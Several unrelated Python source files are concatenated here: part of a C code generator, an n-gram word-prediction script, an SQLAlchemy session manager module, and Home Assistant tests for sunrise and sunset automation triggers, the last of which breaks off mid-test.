return s + ' ' + self._parenthesize_unless_simple(n.expr)
def visit_ExprList(self, n):
visited_subexprs = []
for expr in n.exprs:
visited_subexprs.append(self._visit_expr(expr))
return ', '.join(visited_subexprs)
def visit_InitList(self, n):
visited_subexprs = []
for expr in n.exprs:
visited_subexprs.append(self._visit_expr(expr))
return ', '.join(visited_subexprs)
def visit_Enum(self, n):
s = 'enum'
if n.name: s += ' ' + n.name
if n.values:
s += ' {'
for i, enumerator in enumerate(n.values.enumerators):
s += enumerator.name
if enumerator.value:
s += ' = ' + self.visit(enumerator.value)
if i != len(n.values.enumerators) - 1:
s += ', '
s += '}'
return s
def visit_FuncDef(self, n):
decl = self.visit(n.decl)
self.indent_level = 0
body = self.visit(n.body)
if n.param_decls:
knrdecls = ';\n'.join(self.visit(p) for p in n.param_decls)
return decl + '\n' + knrdecls + ';\n' + body + '\n'
else:
return decl + '\n' + body + '\n'
def visit_FileAST(self, n):
s = ''
for ext in n.ext:
if isinstance(ext, c_ast.FuncDef):
s += self.visit(ext)
elif isinstance(ext, c_ast.Pragma):
s += self.visit(ext) + '\n'
else:
s += self.visit(ext) + ';\n'
return s
def visit_Compound(self, n):
s = self._make_indent() + '{\n'
self.indent_level += 2
if n.block_items:
s += ''.join(self._generate_stmt(stmt) for stmt in n.block_items)
self.indent_level -= 2
s += self._make_indent() + '}\n'
return s
def visit_EmptyStatement(self, n):
return ';'
def visit_ParamList(self, n):
return ', '.join(self.visit(param) for param in n.params)
def visit_Return(self, n):
s = 'return'
if n.expr: s += ' ' + self.visit(n.expr)
return s + ';'
def visit_Break(self, n):
return 'break;'
def visit_Continue(self, n):
return 'continue;'
def visit_TernaryOp(self, n):
s = '(' + self._visit_expr(n.cond) + ') ? '
s += '(' + self._visit_expr(n.iftrue) + ') : '
s += '(' + self._visit_expr(n.iffalse) + ')'
return s
def visit_If(self, n):
s = 'if ('
if n.cond: s += self.visit(n.cond)
s += ')\n'
s += self._generate_stmt(n.iftrue, add_indent=True)
if n.iffalse:
s += self._make_indent() + 'else\n'
s += self._generate_stmt(n.iffalse, add_indent=True)
return s
def visit_For(self, n):
s = 'for ('
if n.init: s += self.visit(n.init)
s += ';'
if n.cond: s += ' ' + self.visit(n.cond)
s += ';'
if n.next: s += ' ' + self.visit(n.next)
s += ')\n'
s += self._generate_stmt(n.stmt, add_indent=True)
return s
def visit_While(self, n):
s = 'while ('
if n.cond: s += self.visit(n.cond)
s += ')\n'
s += self._generate_stmt(n.stmt, add_indent=True)
return s
def visit_DoWhile(self, n):
s = 'do\n'
s += self._generate_stmt(n.stmt, add_indent=True)
s += self._make_indent() + 'while ('
if n.cond: s += self.visit(n.cond)
s += ');'
return s
def visit_Switch(self, n):
s = 'switch (' + self.visit(n.cond) + ')\n'
s += self._generate_stmt(n.stmt, add_indent=True)
return s
def visit_Case(self, n):
s = 'case ' + self.visit(n.expr) + ':\n'
for stmt in n.stmts:
s += self._generate_stmt(stmt, add_indent=True)
return s
def visit_Default(self, n):
s = 'default:\n'
for stmt in n.stmts:
s += self._generate_stmt(stmt, add_indent=True)
return s
def visit_Label(self, n):
return n.name + ':\n' + self._generate_stmt(n.stmt)
def visit_Goto(self, n):
return 'goto ' + n.name + ';'
def visit_EllipsisParam(self, n):
return '...'
def visit_Struct(self, n):
return self._generate_struct_union(n, 'struct')
def visit_Typename(self, n):
return self._generate_type(n.type)
def visit_Union(self, n):
return self._generate_struct_union(n, 'union')
def visit_NamedInitializer(self, n):
s = ''
for name in n.name:
if isinstance(name, c_ast.ID):
s += '.' + name.name
elif isinstance(name, c_ast.Constant):
s += '[' + name.value + ']'
s += ' = ' + self._visit_expr(n.expr)
return s
def visit_FuncDecl(self, n):
return self._generate_type(n)
def _generate_struct_union(self, n, name):
""" Generates code for structs and unions. name should be either
'struct' or union.
"""
s = name + ' ' + (n.name or '')
if n.decls:
s += '\n'
s += self._make_indent()
self.indent_level += 2
s += '{\n'
for decl in n.decls:
s += self._generate_stmt(decl)
self.indent_level -= 2
s += self._make_indent() + '}'
return s
def _generate_stmt(self, n, add_indent=False):
""" Generation from a statement node. This method exists as a wrapper
for individual visit_* methods to handle different treatment of
some statements in this context.
"""
typ = type(n)
if add_indent: self.indent_level += 2
indent = self._make_indent()
if add_indent: self.indent_level -= 2
if typ in (
c_ast.Decl, c_ast.Assignment, c_ast.Cast, c_ast.UnaryOp,
c_ast.BinaryOp, c_ast.TernaryOp, c_ast.FuncCall, c_ast.ArrayRef,
c_ast.StructRef, c_ast.Constant, c_ast.ID, c_ast.Typedef,
c_ast.ExprList):
# These can also appear in an expression context so no semicolon
# is added to them automatically
#
return indent + self.visit(n) + ';\n'
elif typ in (c_ast.Compound,):
# No extra indentation required before the opening brace of a
# compound - because it consists of multiple lines it has to
# compute its own indentation.
#
return self.visit(n)
else:
return indent + self.visit(n) + '\n'
def _generate_decl(self, n):
""" Generation from a Decl node.
"""
s = ''
if n.funcspec: s = ' '.join(n.funcspec) + ' '
if n.storage: s += ' '.join(n.storage) + ' '
s += self._generate_type(n.type)
return s
def _generate_type(self, n, modifiers=[]):
""" Recursive generation from a type node. n is the type node.
modifiers collects the PtrDecl, ArrayDecl and FuncDecl modifiers
encountered on the way down to a TypeDecl, to allow proper
generation from it.
"""
typ = type(n)
#~ print(n, modifiers)
if typ == c_ast.TypeDecl:
s = ''
if n.quals: s += ' '.join(n.quals) + ' '
s += self.visit(n.type)
nstr = n.declname if n.declname else ''
# Resolve modifiers.
# Wrap in parens to distinguish pointer to array and pointer to
# function syntax.
#
for i, modifier in enumerate(modifiers):
if isinstance(modifier, c_ast.ArrayDecl):
if (i != 0 and isinstance(modifiers[i - 1], c_ast.PtrDecl)):
nstr = '(' + nstr + ')'
nstr += '[' + self.visit(modifier.dim) + ']'
elif isinstance(modifier, c_ast.FuncDecl):
if (i != 0 and isinstance(modifiers[i - 1], c_ast.PtrDecl)):
nstr = '(' + nstr + ')'
nstr += '(' + self.visit(modifier.args) + ')'
elif isinstance(modifier, c_ast.PtrDecl):
if modifier.quals:
nstr = '* %s %s' % (' '.join(modifier.quals), nstr)
else:
nstr = '*' + nstr
if nstr: s += ' ' + nstr
return s
elif typ == c_ast.Decl:
return self._generate_decl(n.type)
elif typ == c_ast.Typename:
return self._generate_type(n.type)
elif typ == c_ast.IdentifierType:
return ' '.join(n.names) + ' '
elif typ in (c_ast.ArrayDecl, c_ast.PtrDecl, c_ast.FuncDecl):
return self._generate_type(n.type, modifiers + [n])
else:
return self.visit(n)
def _parenthesize_if(self, n, condition):
""" Visits 'n' and returns its string representation, parenthesized
if the condition function applied to the node returns True.
"""
s = self._visit_expr(n)
if condition(n):
return '(' + s + ')'
else:
return s
def _parenthesize_unless_simple(self, n):
""" Common use case for _parenthesize_if
"""
return self._parenthesize_if(n, lambda d: not self._is_simple_node(d))
def _is_simple_node(self, n):
""" Returns True for nodes that are "simple" - i.e. nodes that always
have higher precedence than operators.
"""
return isinstance(n,( c_ast.Constant, c_ast.ID, c_ast.ArrayRef,
c_ast.StructRef, c_ast.FuncCall))
|
|
#TIME COMPLEXITY :
"""
FOR WORD PREDICTION : O(1)
FOR WORD PREDICTION WITH 'R'TH RANK: O(R)
ADDED POROBAILITY USING INTERPOLATION
"""
#import the modules necessary
from nltk.util import ngrams
from collections import defaultdict
from collections import OrderedDict
import string
import time
import gc
start_time = time.time()
#returns : void
#arg: string,dict,dict,dict,dict
#loads the corpus for the dataset and makes the frequency count of quadgram and trigram strings
def loadCorpus(file_path,tri_dict,quad_dict,vocab_dict,bi_dict):
w1 = '' #for storing the 3rd last word to be used for next token set
w2 = '' #for storing the 2nd last word to be used for next token set
w3 = '' #for storing the last word to be used for next token set
token = []
word_len = 0
#open the corpus file and read it line by line
with open(file_path,'r') as file:
for line in file:
#split the line into tokens
token = line.split()
i = 0
#for each word in the token list ,remove pucntuations and change to lowercase
for word in token :
for l in word :
if l in string.punctuation:
word = word.replace(l," ")
token[i] = word.lower()
i=i+1
#make the token list into a string
content = " ".join(token)
token = content.split()
word_len = word_len + len(token)
if not token:
continue
#add the last word from previous line
if w3!= '':
token.insert(0,w3)
temp0 = list(ngrams(token,2))
#since we are reading line by line some combinations of word might get missed for pairing
#for trigram
#first add the previous words
if w2!= '':
token.insert(0,w2)
#tokens for trigrams
temp1 = list(ngrams(token,3))
#insert the 3rd last word from previous line for quadgram pairing
if w1!= '':
token.insert(0,w1)
#add new unique words to the vocaulary set if available
for word in token:
if word not in vocab_dict:
vocab_dict[word] = 1
else:
vocab_dict[word]+= 1
#tokens for quadgrams
temp2 = list(ngrams(token,4))
#count the frequency of the bigram sentences
for t in temp0:
sen = ' '.join(t)
bi_dict[sen] += 1
#count the frequency of the trigram sentences
for t in temp1:
sen = ' '.join(t)
tri_dict[sen] += 1
#count the frequency of the quadgram sentences
for t in temp2:
sen = ' '.join(t)
quad_dict[sen] += 1
#then take out the last 3 words
n = len(token)
#store the last few words for the next sentence pairing
w1 = token[n -3]
w2 = token[n -2]
w3 = token[n -1]
return word_len
####################################################################################
#returns: string
#arg: string
#remove punctuations and make the string lowercase
def removePunctuations(sen):
#split the string into word tokens
temp_l = sen.split()
i = 0
#changes the word to lowercase and removes punctuations from it
for word in temp_l :
for l in word :
if l in string.punctuation:
word = word.replace(l," ")
temp_l[i] = word.lower()
i=i+1
#spliting is being don here beacause in sentences line here---so after punctuation removal it should
#become "here so"
content = " ".join(temp_l)
return content
####################################################################################
#returns: string
#arg: string,dict,int
#does prediction for the the sentence
def doPrediction(sen,prob_dict,rank = 1):
if sen in prob_dict:
if rank <= len(prob_dict[sen]):
return prob_dict[sen][rank-1][1]
else:
return prob_dict[sen][0][1]
else:
return "Can't predict"
####################################################################################
#returns: void
#arg: dict,dict,dict,dict,dict,int
#creates dict for storing probable words with their probabilities for a trigram sentence
def createProbableWordDict(bi_dict,tri_dict,quad_dict,prob_dict,vocab_dict,token_len):
for quad_sen in quad_dict:
prob = 0.0
quad_token = quad_sen.split()
tri_sen = ' '.join(quad_token[:3])
tri_count = tri_dict[tri_sen]
if tri_count != 0:
prob = interpolatedProbability(quad_token,token_len, vocab_dict, bi_dict, tri_dict, quad_dict,
l1 = 0.25, l2 = 0.25, l3 = 0.25 , l4 = 0.25)
if tri_sen not in prob_dict:
prob_dict[tri_sen] = []
prob_dict[tri_sen].append([prob,quad_token[-1]])
else:
prob_dict[tri_sen].append([prob,quad_token[-1]])
prob = None
tri_count = None
quad_token = None
tri_sen = None
####################################################################################
#returns: void
#arg: dict
#for writing the probable word dict in text file
def writeProbWords(prob_dict):
with open('probab_dict.txt','w') as file:
for key in prob_dict:
file.write(key+' '+str(prob_dict[key])+'\n')
####################################################################################
#returns: void
#arg: dict
#for sorting the probable word acc. to their probabilities
def sortProbWordDict(prob_dict):
for key in prob_dict:
if len(prob_dict[key])>1:
sorted(prob_dict[key],reverse = True)
####################################################################################
#returns: float
#arg: float,float,float,float,list,list,dict,dict,dict,dict
#for calculating the interpolated probablity
def interpolatedProbability(quad_token,token_len, vocab_dict, bi_dict, tri_dict, quad_dict,
l1 = 0.25, l2 = 0.25, l3 = 0.25 , l4 = 0.25):
sen = ' '.join(quad_token)
prob =(
l1*(quad_dict[sen] / tri_dict[' '.join(quad_token[0:3])])
+ l2*(tri_dict[' '.join(quad_token[1:4])] / bi_dict[' '.join(quad_token[1:3])])
+ l3*(bi_dict[' '.join(quad_token[2:4])] / vocab_dict[quad_token[2]])
+ l4*(vocab_dict[quad_token[3]] / token_len)
)
return prob
####################################################################################
#returns: string
#arg: void
#for taking input from user
def takeInput():
cond = False
#take input
while(cond == False):
sen = input('Enter the string\n')
sen = removePunctuations(sen)
temp = sen.split()
if len(temp) < 3:
print("Please enter atleast 3 words !")
else:
cond = True
temp = temp[-3:]
sen = " ".join(temp)
return sen
####################################################################################
def main():
#variable declaration
tri_dict = defaultdict(int) #for keeping count of sentences of three words
quad_dict = defaultdict(int) #for keeping count of sentences of three words
vocab_dict = defaultdict(int) #for storing the different words with their frequencies
prob_dict = OrderedDict() #for storing the probabilities of probable words for a sentence
bi_dict = defaultdict(int)
#load the corpus for the dataset
token_len = loadCorpus('corpusfile.txt',tri_dict,quad_dict,vocab_dict,bi_dict)
print("---Preprocessing Time for Corpus loading: %s seconds ---" % (time.time() - start_time))
start_time1 = time.time()
#creates a dictionary of probable words
createProbableWordDict(bi_dict,tri_dict,quad_dict,prob_dict,vocab_dict,token_len)
#sort the dictionary of probable words
sortProbWordDict(prob_dict)
# writeProbWords(prob_dict)
gc.collect()
print("---Preprocessing Time for Creating Probable Word Dict: %s seconds ---" % (time.time() - start_time1))
sen = takeInput()
start_time2 = time.time()
prediction = doPrediction(sen,prob_dict)
print("Word Prediction:",prediction)
print("---Time for Prediction Operation: %s seconds ---" % (time.time() - start_time2))
if __name__ == '__main__':
main()
|
|
"""Manager class and mixin.
The :class:`Manager` class helps manage a SQLAlchemy database session as well
as provide convenience functions for commons operations.
Configuration
-------------
The following configuration values can be passed into a new :class:`Manager`
instance as a ``dict``, ``class``, or ``module``.
=========================== ==================================================
``SQLALCHEMY_DATABASE_URI`` URI used to connect to the database. Defaults to
``sqlite://``.
``SQLALCHEMY_BINDS`` A ``dict`` that maps bind keys to database URIs.
Optionally, in place of a database URI, a
configuration ``dict`` can be used to overrided
connection options.
``SQLALCHEMY_ECHO`` When ``True`` have SQLAlchemy echo all SQL
statements. Defaults to ``False``.
``SQLALCHEMY_POOL_SIZE`` The size of the database pool. Defaults to the
engine's default (usually ``5``).
``SQLALCHEMY_POOL_TIMEOUT`` Specifies the connection timeout for the pool.
Defaults to ``10``.
``SQLALCHEMY_POOL_RECYCLE`` Number of seconds after which a connection is
automatically recycled.
``SQLALCHEMY_MAX_OVERFLOW`` Controls the number of connections that can be
created after the pool reached its maximum size.
When those additional connections are returned to
the pool, they are disconnected and discarded.
=========================== ==================================================
"""
from functools import partial
import sqlalchemy
from sqlalchemy import orm
from sqlalchemy.engine.url import make_url
from sqlalchemy.orm.exc import UnmappedError
from .model import make_declarative_base, extend_declarative_base
from .query import QueryModel
from .session import Session
from ._compat import string_types, itervalues
__all__ = [
'ManagerMixin',
'Manager',
'Config',
]
class ManagerMixin(object):
"""Extensions for :attr:`Manager.session`."""
def add(self, *instances):
"""Override ``session.add()`` so it can function like
``session.add_all()``.
Note:
Supports chaining.
"""
for instance in instances:
if isinstance(instance, list):
self.add(*instance)
else:
self.session.add(instance)
return self.session
def add_commit(self, *instances):
"""Add instances to session and commit in one call."""
self.add(*instances).commit()
def delete(self, *instances):
"""Override ``session.delete()`` so it can function like
``session.add_all()``.
Note:
Supports chaining.
"""
for instance in instances:
if isinstance(instance, list):
self.delete(*instance)
else:
self.session.delete(instance)
return self.session
def delete_commit(self, *instances):
"""Delete instances to session and commit in one call."""
self.delete(*instances).commit()
class Manager(ManagerMixin):
"""Manager class for database session.
Initialization of :class:`Manager` accepts a config object, session
options, and an optional declarative base. If ``Model`` isn't provided,
then a default one is generated using
:func:`alchy.model.make_declarative_base`. The declarative base model is
accessible at :attr:`Model`.
By default the ``session_options`` are::
{
'query_cls': alchy.Query,
'autocommit': False,
'autoflush': True
}
The default :attr:`session_class` is :class:`alchy.Session`. If you want to
provide your own session class, then it's suggested that you subclass
:class:`alchy.Session` and pass it in via :attr:`session_class`. This way
your subclass will inherit the functionality of :class:`alchy.Session`.
"""
def __init__(self,
config=None,
session_options=None,
Model=None,
session_class=None):
#: Database engine configuration options.
self.config = Config(defaults={
'SQLALCHEMY_DATABASE_URI': 'sqlite://',
'SQLALCHEMY_BINDS': None,
'SQLALCHEMY_ECHO': False,
'SQLALCHEMY_POOL_SIZE': None,
'SQLALCHEMY_POOL_TIMEOUT': None,
'SQLALCHEMY_POOL_RECYCLE': None,
'SQLALCHEMY_MAX_OVERFLOW': None
})
if isinstance(config, dict):
self.config.update(config)
elif config is not None:
self.config.from_object(config)
self._engines = {}
self._binds = {}
if session_options is None:
session_options = {}
session_options.setdefault('query_cls', QueryModel)
session_options.setdefault('autocommit', False)
session_options.setdefault('autoflush', True)
#: Class to used for session object.
self.session_class = session_class or Session
#: Scoped session object.
self.session = self.create_scoped_session(session_options)
if Model is None:
#: Declarative base model class.
self.Model = make_declarative_base()
else:
self.Model = Model
if self.Model:
extend_declarative_base(self.Model, self.session)
@property
def metadata(self):
"""Return :attr:`Model` metadata object."""
return getattr(self.Model, 'metadata', None)
@property
def binds(self):
"""Returns config options for all binds."""
if not self._binds:
self._binds = {
None: self.config['SQLALCHEMY_DATABASE_URI']
}
if self.config['SQLALCHEMY_BINDS']:
self._binds.update(self.config['SQLALCHEMY_BINDS'])
return self._binds
@property
def binds_map(self):
"""Returns a dictionary with a table->engine mapping. This is suitable
for use in ``sessionmaker(binds=binds_map)``.
"""
binds = list(self.binds)
retval = {}
for bind in binds:
engine = self.get_engine(bind)
tables = self.get_tables_for_bind(bind)
retval.update(dict((table, engine) for table in tables))
return retval
@property
def engine(self):
"""Return default database engine."""
return self.get_engine()
def create_engine(self, uri_or_config):
"""Create engine using either a URI or a config dict. If URI supplied,
then the default :attr:`config` will be used. If config supplied, then
URI in config will be used.
"""
if isinstance(uri_or_config, dict):
uri = uri_or_config['SQLALCHEMY_DATABASE_URI']
config = uri_or_config
else:
uri = uri_or_config
config = self.config
options = engine_options_from_config(config)
return sqlalchemy.create_engine(make_url(uri), **options)
def get_engine(self, bind=None):
"""Return engine associated with bind. Create engine if it doesn't
already exist.
"""
if bind not in self._engines:
assert bind in self.binds, (
'Bind {0} is not specified. '
'Set in SQLALCHEMY_BINDS configuration variable'.format(bind))
self._engines[bind] = self.create_engine(self.binds[bind])
return self._engines[bind]
def create_scoped_session(self, options=None):
"""Create scoped session which internally calls :meth:`create_session`.
"""
if options is None: # pragma: no cover
options = {}
return orm.scoped_session(partial(self.create_session, options))
def create_session(self, options):
"""Create session instance using custom Session class that supports
multiple bindings.
"""
return self.session_class(self, **options)
def get_tables_for_bind(self, bind=None):
"""Returns a list of all tables relevant for a bind."""
return [table
for table in itervalues(self.metadata.tables)
if table.info.get('bind_key') == bind]
def _execute_for_all_tables(self, bind, operation, skip_tables=False):
"""Execute metadata operation for associated tables."""
if self.metadata is None:
raise UnmappedError('Missing declarative base model')
if bind == '__all__':
binds = [None] + list(self.config.get('SQLALCHEMY_BINDS') or {})
elif isinstance(bind, string_types) or bind is None:
binds = [bind]
else:
binds = bind
for bind in binds:
extra = {}
if not skip_tables:
tables = self.get_tables_for_bind(bind)
extra['tables'] = tables
metadata_operation = getattr(self.metadata, operation)
metadata_operation(bind=self.get_engine(bind), **extra)
def create_all(self, bind='__all__'):
"""Create database schema from models."""
self._execute_for_all_tables(bind, 'create_all')
def drop_all(self, bind='__all__'):
"""Drop tables defined by models."""
self._execute_for_all_tables(bind, 'drop_all')
def reflect(self, bind='__all__'):
"""Reflect tables from database."""
self._execute_for_all_tables(bind, 'reflect', skip_tables=True)
def __getattr__(self, attr):
"""Delegate all other attributes to :attr:`session`."""
return getattr(self.session, attr)
class Config(dict):
"""Configuration loader which acts like a dict but supports loading
values from an object limited to ``ALL_CAPS_ATTRIBUTES``.
"""
def __init__(self, defaults=None):
super(Config, self).__init__(defaults or {})
def from_object(self, obj):
"""Pull ``dir(obj)`` keys from `obj` and set onto ``self``."""
for key in dir(obj):
if key.isupper():
self[key] = getattr(obj, key)
def engine_options_from_config(config):
"""Return engine options derived from config object."""
options = {}
def _setdefault(optionkey, configkey):
"""Set options key if config key is not None."""
if config.get(configkey) is not None:
options[optionkey] = config[configkey]
_setdefault('echo', 'SQLALCHEMY_ECHO')
_setdefault('pool_size', 'SQLALCHEMY_POOL_SIZE')
_setdefault('pool_timeout', 'SQLALCHEMY_POOL_TIMEOUT')
_setdefault('pool_recycle', 'SQLALCHEMY_POOL_RECYCLE')
_setdefault('max_overflow', 'SQLALCHEMY_MAX_OVERFLOW')
return options
|
|
"""The tests for the sun automation."""
from datetime import datetime
import pytest
from homeassistant.components import sun
import homeassistant.components.automation as automation
from homeassistant.const import SUN_EVENT_SUNRISE, SUN_EVENT_SUNSET
from homeassistant.setup import async_setup_component
import homeassistant.util.dt as dt_util
from tests.async_mock import patch
from tests.common import async_fire_time_changed, async_mock_service, mock_component
from tests.components.automation import common
ORIG_TIME_ZONE = dt_util.DEFAULT_TIME_ZONE
@pytest.fixture
def calls(hass):
"""Track calls to a mock service."""
return async_mock_service(hass, "test", "automation")
@pytest.fixture(autouse=True)
def setup_comp(hass):
"""Initialize components."""
mock_component(hass, "group")
dt_util.set_default_time_zone(hass.config.time_zone)
hass.loop.run_until_complete(
async_setup_component(hass, sun.DOMAIN, {sun.DOMAIN: {sun.CONF_ELEVATION: 0}})
)
def teardown():
"""Restore."""
dt_util.set_default_time_zone(ORIG_TIME_ZONE)
async def test_sunset_trigger(hass, calls, legacy_patchable_time):
"""Test the sunset trigger."""
now = datetime(2015, 9, 15, 23, tzinfo=dt_util.UTC)
trigger_time = datetime(2015, 9, 16, 2, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {"platform": "sun", "event": SUN_EVENT_SUNSET},
"action": {"service": "test.automation"},
}
},
)
await common.async_turn_off(hass)
await hass.async_block_till_done()
async_fire_time_changed(hass, trigger_time)
await hass.async_block_till_done()
assert len(calls) == 0
with patch("homeassistant.util.dt.utcnow", return_value=now):
await common.async_turn_on(hass)
await hass.async_block_till_done()
async_fire_time_changed(hass, trigger_time)
await hass.async_block_till_done()
assert len(calls) == 1
async def test_sunrise_trigger(hass, calls, legacy_patchable_time):
"""Test the sunrise trigger."""
now = datetime(2015, 9, 13, 23, tzinfo=dt_util.UTC)
trigger_time = datetime(2015, 9, 16, 14, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {"platform": "sun", "event": SUN_EVENT_SUNRISE},
"action": {"service": "test.automation"},
}
},
)
async_fire_time_changed(hass, trigger_time)
await hass.async_block_till_done()
assert len(calls) == 1
async def test_sunset_trigger_with_offset(hass, calls, legacy_patchable_time):
"""Test the sunset trigger with offset."""
now = datetime(2015, 9, 15, 23, tzinfo=dt_util.UTC)
trigger_time = datetime(2015, 9, 16, 2, 30, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {
"platform": "sun",
"event": SUN_EVENT_SUNSET,
"offset": "0:30:00",
},
"action": {
"service": "test.automation",
"data_template": {
"some": "{{ trigger.%s }}"
% "}} - {{ trigger.".join(("platform", "event", "offset"))
},
},
}
},
)
async_fire_time_changed(hass, trigger_time)
await hass.async_block_till_done()
assert len(calls) == 1
assert calls[0].data["some"] == "sun - sunset - 0:30:00"
async def test_sunrise_trigger_with_offset(hass, calls, legacy_patchable_time):
"""Test the sunrise trigger with offset."""
now = datetime(2015, 9, 13, 23, tzinfo=dt_util.UTC)
trigger_time = datetime(2015, 9, 16, 13, 30, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {
"platform": "sun",
"event": SUN_EVENT_SUNRISE,
"offset": "-0:30:00",
},
"action": {"service": "test.automation"},
}
},
)
async_fire_time_changed(hass, trigger_time)
await hass.async_block_till_done()
assert len(calls) == 1
async def test_if_action_before_sunrise_no_offset(hass, calls):
"""
Test if action was before sunrise.
Before sunrise is true from midnight until sunset, local time.
"""
await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {"platform": "event", "event_type": "test_event"},
"condition": {"condition": "sun", "before": SUN_EVENT_SUNRISE},
"action": {"service": "test.automation"},
}
},
)
# sunrise: 2015-09-16 06:32:43 local, sunset: 2015-09-16 18:55:24 local
# sunrise: 2015-09-16 13:32:43 UTC, sunset: 2015-09-17 01:55:24 UTC
# now = sunrise + 1s -> 'before sunrise' not true
now = datetime(2015, 9, 16, 13, 32, 44, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 0
# now = sunrise -> 'before sunrise' true
now = datetime(2015, 9, 16, 13, 32, 43, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 1
# now = local midnight -> 'before sunrise' true
now = datetime(2015, 9, 16, 7, 0, 0, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 2
# now = local midnight - 1s -> 'before sunrise' not true
now = datetime(2015, 9, 17, 6, 59, 59, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 2
async def test_if_action_after_sunrise_no_offset(hass, calls):
"""
Test if action was after sunrise.
After sunrise is true from sunrise until midnight, local time.
"""
await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {"platform": "event", "event_type": "test_event"},
"condition": {"condition": "sun", "after": SUN_EVENT_SUNRISE},
"action": {"service": "test.automation"},
}
},
)
# sunrise: 2015-09-16 06:32:43 local, sunset: 2015-09-16 18:55:24 local
# sunrise: 2015-09-16 13:32:43 UTC, sunset: 2015-09-17 01:55:24 UTC
# now = sunrise - 1s -> 'after sunrise' not true
now = datetime(2015, 9, 16, 13, 32, 42, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 0
# now = sunrise + 1s -> 'after sunrise' true
now = datetime(2015, 9, 16, 13, 32, 43, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 1
# now = local midnight -> 'after sunrise' not true
now = datetime(2015, 9, 16, 7, 0, 0, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 1
# now = local midnight - 1s -> 'after sunrise' true
now = datetime(2015, 9, 17, 6, 59, 59, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 2
async def test_if_action_before_sunrise_with_offset(hass, calls):
"""
Test if action was before sunrise with offset.
Before sunrise is true from midnight until sunset, local time.
"""
await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {"platform": "event", "event_type": "test_event"},
"condition": {
"condition": "sun",
"before": SUN_EVENT_SUNRISE,
"before_offset": "+1:00:00",
},
"action": {"service": "test.automation"},
}
},
)
# sunrise: 2015-09-16 06:32:43 local, sunset: 2015-09-16 18:55:24 local
# sunrise: 2015-09-16 13:32:43 UTC, sunset: 2015-09-17 01:55:24 UTC
# now = sunrise + 1s + 1h -> 'before sunrise' with offset +1h not true
now = datetime(2015, 9, 16, 14, 32, 44, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 0
# now = sunrise + 1h -> 'before sunrise' with offset +1h true
now = datetime(2015, 9, 16, 14, 32, 43, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 1
# now = UTC midnight -> 'before sunrise' with offset +1h not true
now = datetime(2015, 9, 17, 0, 0, 0, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 1
# now = UTC midnight - 1s -> 'before sunrise' with offset +1h not true
now = datetime(2015, 9, 16, 23, 59, 59, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 1
# now = local midnight -> 'before sunrise' with offset +1h true
now = datetime(2015, 9, 16, 7, 0, 0, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 2
# now = local midnight - 1s -> 'before sunrise' with offset +1h not true
now = datetime(2015, 9, 17, 6, 59, 59, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 2
# now = sunset -> 'before sunrise' with offset +1h not true
now = datetime(2015, 9, 17, 1, 56, 48, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 2
# now = sunset -1s -> 'before sunrise' with offset +1h not true
now = datetime(2015, 9, 17, 1, 56, 45, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 2
async def test_if_action_before_sunset_with_offset(hass, calls):
"""
Test if action was before sunset with offset.
Before sunset is true from midnight until sunset, local time.
"""
await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {"platform": "event", "event_type": "test_event"},
"condition": {
"condition": "sun",
"before": "sunset",
"before_offset": "+1:00:00",
},
